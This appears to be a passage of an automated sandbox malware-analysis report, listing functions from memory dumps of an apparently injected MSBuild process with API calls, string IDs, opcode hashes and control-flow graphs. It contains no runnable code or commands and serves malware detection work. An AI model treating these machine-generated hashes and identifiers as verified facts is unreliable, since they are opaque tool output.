                                    • Source File: 00000005.00000002.3312733553.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_6a00000_MSBuild.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 8c801f450c02649ae5d3ec83f4cedd2736505a9c704a9bd84876e29122c31014
                                    • Instruction ID: 3e4cdd69f9a3b21ec54ff2a3c873ba30cced0c9b0e7783a7ef3f2ce381c13cc4
                                    • Opcode Fuzzy Hash: 8c801f450c02649ae5d3ec83f4cedd2736505a9c704a9bd84876e29122c31014
                                    • Instruction Fuzzy Hash: 7941C0B1D103099FDB14DF99D984ADEBFB5FF88310F24812AE818AB250D774A945CF90
                                    Function 06A0E46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2888 6a0e46c-6a0fc6c 2891 6a0fc72-6a0fc77 2888->2891 2892 6a0fd1c-6a0fd3c call 6a0a48c 2888->2892 2894 6a0fc79-6a0fcb0 2891->2894 2895 6a0fcca-6a0fd02 CallWindowProcW 2891->2895 2899 6a0fd3f-6a0fd4c 2892->2899 2901 6a0fcb2-6a0fcb8 2894->2901 2902 6a0fcb9-6a0fcc8 2894->2902 2897 6a0fd04-6a0fd0a 2895->2897 2898 6a0fd0b-6a0fd1a 2895->2898 2897->2898 2898->2899 2901->2902 2902->2899
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06A0FCF1
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312733553.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_6a00000_MSBuild.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: 4e074225610bfe393ed840c88dce76676c58b6e206cc24b8561fd0561256ecfe
                                    • Instruction ID: 21e10656a95a0d1722660eb5294feaa5effddae8b1be80921a12ed88db89f7b0
                                    • Opcode Fuzzy Hash: 4e074225610bfe393ed840c88dce76676c58b6e206cc24b8561fd0561256ecfe
                                    • Instruction Fuzzy Hash: 6C4168B4900309CFDB54DF99C488AAABBF5FF88314F24C859D919AB361D334A845CBA0
                                    Function 068BE658 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2905 68be658-68be696 2906 68be69e-68be6cc GlobalMemoryStatusEx 2905->2906 2907 68be6ce-68be6d4 2906->2907 2908 68be6d5-68be6fd 2906->2908 2907->2908
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 068BE6BF
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: 91d9e360b668aaf2a05eecdae5b3d6f10cdab4f6578ed971a0040e99a1ec65e9
                                    • Instruction ID: 837688acce227a0434785c44e57cae88c3d0611061d3e9b714719cfec16026ac
                                    • Opcode Fuzzy Hash: 91d9e360b668aaf2a05eecdae5b3d6f10cdab4f6578ed971a0040e99a1ec65e9
                                    • Instruction Fuzzy Hash: D511DDB1C006599BCB10DF9AC948ADEFBB4AF49320F14816ADA18A7250D778A944CFA5
                                    Function 01563E7E Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V%m
                                    • API String ID: 0-324988934
                                    • Opcode ID: 938bd8049b945ab9483812cf29faca69bba859bc824f4a7c7470529af25e1bc9
                                    • Instruction ID: 1fa7e6a6941ee2d6b94d72123e97a85d91978655afcb1388ace71aa385c39417
                                    • Opcode Fuzzy Hash: 938bd8049b945ab9483812cf29faca69bba859bc824f4a7c7470529af25e1bc9
                                    • Instruction Fuzzy Hash: 2AA16C70E00209DFDF50CFA8C9817DEBBF5BF88314F148129E419AB294EB749886CB85
                                    Function 01566EE8 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    • Opcode ID: 8b305b88fa5c18e4137b023589d9d9b1193267097faf684094277f4b6ccc8fb3
                                    • Instruction ID: 940ed38014c8d12440d64a625c2d6e4a9df60ee7c6137c282a7a995c4e91dc09
                                    • Opcode Fuzzy Hash: 8b305b88fa5c18e4137b023589d9d9b1193267097faf684094277f4b6ccc8fb3
                                    • Instruction Fuzzy Hash: 5B618D34700215CFDB15DB68C868AAE7BFABF89714F20446AD402EF3A5DB759C41CBA1
                                    Function 01567DA8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    • Opcode ID: adf28092589ac9392cbfdd4abc70af9f876094ab2f8a3031fd6764baa2a632d7
                                    • Instruction ID: 6e4313bc5b03036bd6bcb5a9c35d3f516e34853c904aa957811e12b6d7769ffd
                                    • Opcode Fuzzy Hash: adf28092589ac9392cbfdd4abc70af9f876094ab2f8a3031fd6764baa2a632d7
                                    • Instruction Fuzzy Hash: A6318131E10209DFDB15CFA9C84469EB7B5FF89314F108865E806EB240EB74AD46CB91
                                    Function 01567D98 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    • Opcode ID: 60632daa743070e5a39cf8e841c6628618aaf269c3e49ed5ceaee1e1516ba09f
                                    • Instruction ID: e559cfd86f968b5199a0583845f025ec35379f9fe9b1cf4cf2f3d82f43d00a61
                                    • Opcode Fuzzy Hash: 60632daa743070e5a39cf8e841c6628618aaf269c3e49ed5ceaee1e1516ba09f
                                    • Instruction Fuzzy Hash: BB316231E10209CFDB15CF79C89469EB7B5FF89314F20886AE801EB240E774AD468B91
                                    Function 01566BB0 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    • Opcode ID: 610d102733e995bb8efd5e27142af6dcfe243b51409b5e4d22f10952cb8782ee
                                    • Instruction ID: 2f6a3e0135b106c59c0e5b8b5d89257aba8b853b0c13e864decde66d64079911
                                    • Opcode Fuzzy Hash: 610d102733e995bb8efd5e27142af6dcfe243b51409b5e4d22f10952cb8782ee
                                    • Instruction Fuzzy Hash: FF21F8317043129FC706EF7DD06429E7BE6FF86611B0145ABC045CB69AEA359C46C7D2
                                    Function 01568739 Relevance: .6, Instructions: 555COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3891e18ee14de022423cd3f7de33411a39bc88f68486542a1d6ea36d8535c33b
                                    • Instruction ID: c68ce8ebea8c58c2a161e609b4c9997086f0c2d8cbfd59ce1715146581dd3edc
                                    • Opcode Fuzzy Hash: 3891e18ee14de022423cd3f7de33411a39bc88f68486542a1d6ea36d8535c33b
                                    • Instruction Fuzzy Hash: 521271B070120A9FDB1AAF2CE49862C76ABFB85301B144D79D405CB3A9DF79EC46C790
                                    Function 01568748 Relevance: .6, Instructions: 550COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9b8ba81a8a04418bc3bb962c634746d4415e1f0bb11c23986d8276002ab59ef1
                                    • Instruction ID: c491bec713a668598449fe03d6a5f0cd054e6c9c75577f450f63c06f0a33492c
                                    • Opcode Fuzzy Hash: 9b8ba81a8a04418bc3bb962c634746d4415e1f0bb11c23986d8276002ab59ef1
                                    • Instruction Fuzzy Hash: DE1283B070110A9FDB1AAF2CE49862D76ABFB85301B144D79D405CB3A9DF79EC46C790
                                    Function 01564A96 Relevance: .3, Instructions: 260COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 08c4ffa01b398ff1dbb63681174dd2bd169bda7f20853cc0f3bc0fce4ad1696d
                                    • Instruction ID: d324d7f5b3ffe4f0b4e6b9154abb9c0c8e352d7795f434c7b0184331c946d971
                                    • Opcode Fuzzy Hash: 08c4ffa01b398ff1dbb63681174dd2bd169bda7f20853cc0f3bc0fce4ad1696d
                                    • Instruction Fuzzy Hash: E0B13A70E0020ACFEF10CFA9D98579DBBF6BF88714F148529D419AB394EB749885CB81
                                    Function 0156A1C2 Relevance: .3, Instructions: 251COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ca30a9b20ab378a2045c4a6ffb6403645865829408c8819c7f90e5ed56b3ba65
                                    • Instruction ID: 0a167c0ce71e5cedb636b3284f68868b944c707db08db3487d2ef74329cc207d
                                    • Opcode Fuzzy Hash: ca30a9b20ab378a2045c4a6ffb6403645865829408c8819c7f90e5ed56b3ba65
                                    • Instruction Fuzzy Hash: 6AA14D34A002059FDB15DF68D988A6DBBF6FF88311F148565E406EB3A5DB35EC42CB90
                                    Function 0156A6D8 Relevance: .2, Instructions: 211COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f12afd9997c18d3f0aba0f2f43f92ac0e0f6ae30b8b8a2565251bea9f3ebb1d
                                    • Instruction ID: 8f3123d9bf3cf3f06a360d6275e24fe23518d03913a50c8ff1f48f734a86956f
                                    • Opcode Fuzzy Hash: 7f12afd9997c18d3f0aba0f2f43f92ac0e0f6ae30b8b8a2565251bea9f3ebb1d
                                    • Instruction Fuzzy Hash: D6814971A002058FDB54DF69D884B9DBBF6FF88310F24C16AE909AB395DB749845CB90
                                    Function 0156A510 Relevance: .1, Instructions: 144COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 84071c0485d1b3fd13a84c3239d47f90f6eb9a8d649c1c7c53452c31ebf0784b
                                    • Instruction ID: 1e231ca2521379db49c7b7a1effc4171bf50f3e8bdbc2717801878f0513cc9ab
                                    • Opcode Fuzzy Hash: 84071c0485d1b3fd13a84c3239d47f90f6eb9a8d649c1c7c53452c31ebf0784b
                                    • Instruction Fuzzy Hash: 7841A430B0020A8BDF25DA6CD98076EB7A9FBC5314F20482AD50AEF291D735DC458BD2
                                    Function 01566CEE Relevance: .1, Instructions: 137COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5de467bb3c679b6523463a435b9ca280dce8521a07a0b74a9b28192b4e5ef789
                                    • Instruction ID: 24cd9ed2b0d7c7d9c643a8a12830b33a40227547fd77c86d3c9d485557616c6e
                                    • Opcode Fuzzy Hash: 5de467bb3c679b6523463a435b9ca280dce8521a07a0b74a9b28192b4e5ef789
                                    • Instruction Fuzzy Hash: 92511575D102188FDB18CFA9C89479EBBB5BF48314F14852AE819BB350DB74A844CB95
                                    Function 01566CF8 Relevance: .1, Instructions: 132COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b3ead563025ece67af772772a0230190adb99155d73701d7af1e97b44f556411
                                    • Instruction ID: d8db6e6840a32f34422e1ab3e41e91f9299ad99cdc90758fd7d93f89779d5386
                                    • Opcode Fuzzy Hash: b3ead563025ece67af772772a0230190adb99155d73701d7af1e97b44f556411
                                    • Instruction Fuzzy Hash: E7510475D102188FDB18CFA9C884B9EBBF5BF48314F148529E819BB391DB74A844CF95
                                    Function 0156A502 Relevance: .1, Instructions: 121COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 95e1c40dead15b289869ba2962636f2f86a66f068de2e264fbd4a0a330221829
                                    • Instruction ID: f4d7155afcc069614aa56aef83bb9915c21b95bde5c9f63d005915ae83d9032d
                                    • Opcode Fuzzy Hash: 95e1c40dead15b289869ba2962636f2f86a66f068de2e264fbd4a0a330221829
                                    • Instruction Fuzzy Hash: 96417370B002068BDF25DE6CC59076EB7AAFBC5310F20452AD40AEF251D735DC858BD2
                                    Function 01561138 Relevance: .1, Instructions: 112COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8a9be5edb360d6ba567c1e34770176199fdc521a93ff92ed0eb5fa02fd46b880
                                    • Instruction ID: b06f85df4b7e86319eb9e3e3000005c4636172702ea99412f1ce0e291cfcd251
                                    • Opcode Fuzzy Hash: 8a9be5edb360d6ba567c1e34770176199fdc521a93ff92ed0eb5fa02fd46b880
                                    • Instruction Fuzzy Hash: D251B7B125214A9FCB0AEF28F9E0D553F69FB9530430C8A79D0455B23EEB346909DBA0
                                    Function 015626E4 Relevance: .1, Instructions: 93COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 960bcea7a3435bbf09da4e5620c7a60fc96753564be94fb3c4680e1ab9c87a30
                                    • Instruction ID: 1f8308346bab4f61b08bdc19b1712e17c7b047eb65fa77861398a34d36ed2f33
                                    • Opcode Fuzzy Hash: 960bcea7a3435bbf09da4e5620c7a60fc96753564be94fb3c4680e1ab9c87a30
                                    • Instruction Fuzzy Hash: BF41EDB5D003499FDB14CFA9C984ADEBFF5FF48310F14842AE419AB250DB75A989CB90
                                    Function 015626F0 Relevance: .1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4dfc6e363f947c02d4b1416e7185ec25effb79ea08204685edae47359540f22
                                    • Instruction ID: 2023469f0e0f11a367a8192da134a9081a99a9ec96ef0f301ce5083dcae6dfe8
                                    • Opcode Fuzzy Hash: f4dfc6e363f947c02d4b1416e7185ec25effb79ea08204685edae47359540f22
                                    • Instruction Fuzzy Hash: 9141DEB0D003499FDB14DFA9C984ADEBFF5FF48310F248429E809AB254DB75A949CB90
                                    Function 0156A080 Relevance: .1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b93547c8a53a8aef22149087e5cb09f2cda4818d00d5fc9da2a05d5bbfeff301
                                    • Instruction ID: 18ede43fcf87d457d1e9fc40819f818df6b4a9097fcdec31406bfd52ca715bbb
                                    • Opcode Fuzzy Hash: b93547c8a53a8aef22149087e5cb09f2cda4818d00d5fc9da2a05d5bbfeff301
                                    • Instruction Fuzzy Hash: 3031A031A0020ADBDB05CF68D89469EFBB6BF85300F10C619E415FB395DB74A846CB80
                                    Function 0156A090 Relevance: .1, Instructions: 78COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4cba037bce92c563f18e4ad8d4bb9e4f803f126b065d45c51a3d8a2060b9ad9e
                                    • Instruction ID: 3aa0f7c0b3d9a26b922c7dfe4a3822b9fdd8b3edda8ec1b96d50b9d926883fbb
                                    • Opcode Fuzzy Hash: 4cba037bce92c563f18e4ad8d4bb9e4f803f126b065d45c51a3d8a2060b9ad9e
                                    • Instruction Fuzzy Hash: 3A218071E0020A9BDB16CF69D89469EFBB6FF85300F10C619E805BB355EB74A846CB91
                                    Function 015616A8 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2e0bd1f18e94356e537f0c0a9c3aebe866e6cd60583b349a77be9c26cf60adc2
                                    • Instruction ID: 05b47085fa53033774f7a2bb152ec39bbab04452e2850adf36d2745033720005
                                    • Opcode Fuzzy Hash: 2e0bd1f18e94356e537f0c0a9c3aebe866e6cd60583b349a77be9c26cf60adc2
                                    • Instruction Fuzzy Hash: 992183746401064FCB26AB2CF5D4BAD376DFB85314F104A36D006CF26AEB28DC45CB91
                                    Function 01569F80 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8e92d49cb7b0175f110d072d0283cdd0d1d3edf70ec904245f3943d5b6dc454
                                    • Instruction ID: 14440cd73844d2ffdf80e778b978c627b707a6bfffd90298353eb53c31eb5cb6
                                    • Opcode Fuzzy Hash: d8e92d49cb7b0175f110d072d0283cdd0d1d3edf70ec904245f3943d5b6dc454
                                    • Instruction Fuzzy Hash: 9A21B331E00206DFCB15CFA9C4506DEF7B6BF89314F11862AE815BB351EB71A846CB81
                                    Function 01561880 Relevance: .1, Instructions: 73COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d9fbaa29960905fe4c7084c81d998e0dd5b53ea702d21e91f1388f243ac70d61
                                    • Instruction ID: 1c9211db92485f48bed2151a35e55ae423886e1bb6ecdb2ccb34222c90f15c86
                                    • Opcode Fuzzy Hash: d9fbaa29960905fe4c7084c81d998e0dd5b53ea702d21e91f1388f243ac70d61
                                    • Instruction Fuzzy Hash: D2216B30B0060ACFDB14EB78C5946BE77F5BFC9250B100569D105EF2A0DB328D42CB91
                                    Function 01561382 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65e7a0941d2aa8b59e16189f81b9399524bf0d9c1f8c1938115088d11f8992bc
                                    • Instruction ID: 2bf959305d1818454af24829258f90c4b01d39c8061def6c673f67cb9b4a50a4
                                    • Opcode Fuzzy Hash: 65e7a0941d2aa8b59e16189f81b9399524bf0d9c1f8c1938115088d11f8992bc
                                    • Instruction Fuzzy Hash: 8A21A170A006458FDF3A666CE1D837C37AAFB82316F01086AD447CF796EA298849C791
                                    Function 01564F90 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a2f9126f4ee2ce94188b434c7f01ab01d4b3644264bfecb087cdc272bcffdb7
                                    • Instruction ID: c4f739fd05aa831d7b2abd2253a3bfff04542821e4e3c263c737b98ec17c3ec3
                                    • Opcode Fuzzy Hash: 0a2f9126f4ee2ce94188b434c7f01ab01d4b3644264bfecb087cdc272bcffdb7
                                    • Instruction Fuzzy Hash: AD2139307402058FDB54EB78C568AADBBF5BF89250B100468E406DF3A1EB32DC00CB91
                                    Function 014FD030 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308434135.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_14fd000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be96dffcf819578b1f23c9aa2194963e60a913ff0ac1f25c0e2db605c9700a62
                                    • Instruction ID: e8b038a6b205bd77c9f565728af98a2635f87dac61cf017c9ff9326b319b7f1d
                                    • Opcode Fuzzy Hash: be96dffcf819578b1f23c9aa2194963e60a913ff0ac1f25c0e2db605c9700a62
                                    • Instruction Fuzzy Hash: E021F5B1904204DFDB15DF58D980B26BB65FB84318F24C56EDA0A4B366C33AD447CA62
                                    Function 01561890 Relevance: .1, Instructions: 70COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 529da7fb3db39983081668836facd81ba2c0ad2aba972bb6bec55504fab418ee
                                    • Instruction ID: cec145b9985d3758ab03f25b910268ce40a4e22f440e2d770116b3a2f3f58282
                                    • Opcode Fuzzy Hash: 529da7fb3db39983081668836facd81ba2c0ad2aba972bb6bec55504fab418ee
                                    • Instruction Fuzzy Hash: C3212A30B00609CFDB15EB68C5A46BE77FABFC9240F100868D506EF2A4DB369D41CBA1
                                    Function 01569F90 Relevance: .1, Instructions: 70COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9c2cea6a472534def58bb04cea26d4a723c947b05d9ecb0c169d74385e9d81e9
                                    • Instruction ID: 39fcd90c88ad4ed9217053369760e592cb318d0722fc4fe7047e7d219979ff02
                                    • Opcode Fuzzy Hash: 9c2cea6a472534def58bb04cea26d4a723c947b05d9ecb0c169d74385e9d81e9
                                    • Instruction Fuzzy Hash: F7216231E00206DFCB19CFA9C45069EF7B6BF89314F10861AE815FB341DB75A946CB91
                                    Function 015616B8 Relevance: .1, Instructions: 69COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a826f85ece5a1ac1e4d28a502059760b6a4d01ed2579f4ae343c313e2d8cd37a
                                    • Instruction ID: ea73eadec928eac65e3f5adf313e49c593c8b504902402be362f2a0d956920ef
                                    • Opcode Fuzzy Hash: a826f85ece5a1ac1e4d28a502059760b6a4d01ed2579f4ae343c313e2d8cd37a
                                    • Instruction Fuzzy Hash: 142142786405065FDB26AA28F9D4B6D375DFB85304F104A36D006CF26AEB28D849CBD1
                                    Function 01564FA0 Relevance: .1, Instructions: 68COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b052188a632acdadc1b0117af9c0c5025363887cc906fe60dadf49cce6d09549
                                    • Instruction ID: a2d159f36d7ab02ddebaf4b70440c4ea38c4da23a462e41a76ce5817f76f0157
                                    • Opcode Fuzzy Hash: b052188a632acdadc1b0117af9c0c5025363887cc906fe60dadf49cce6d09549
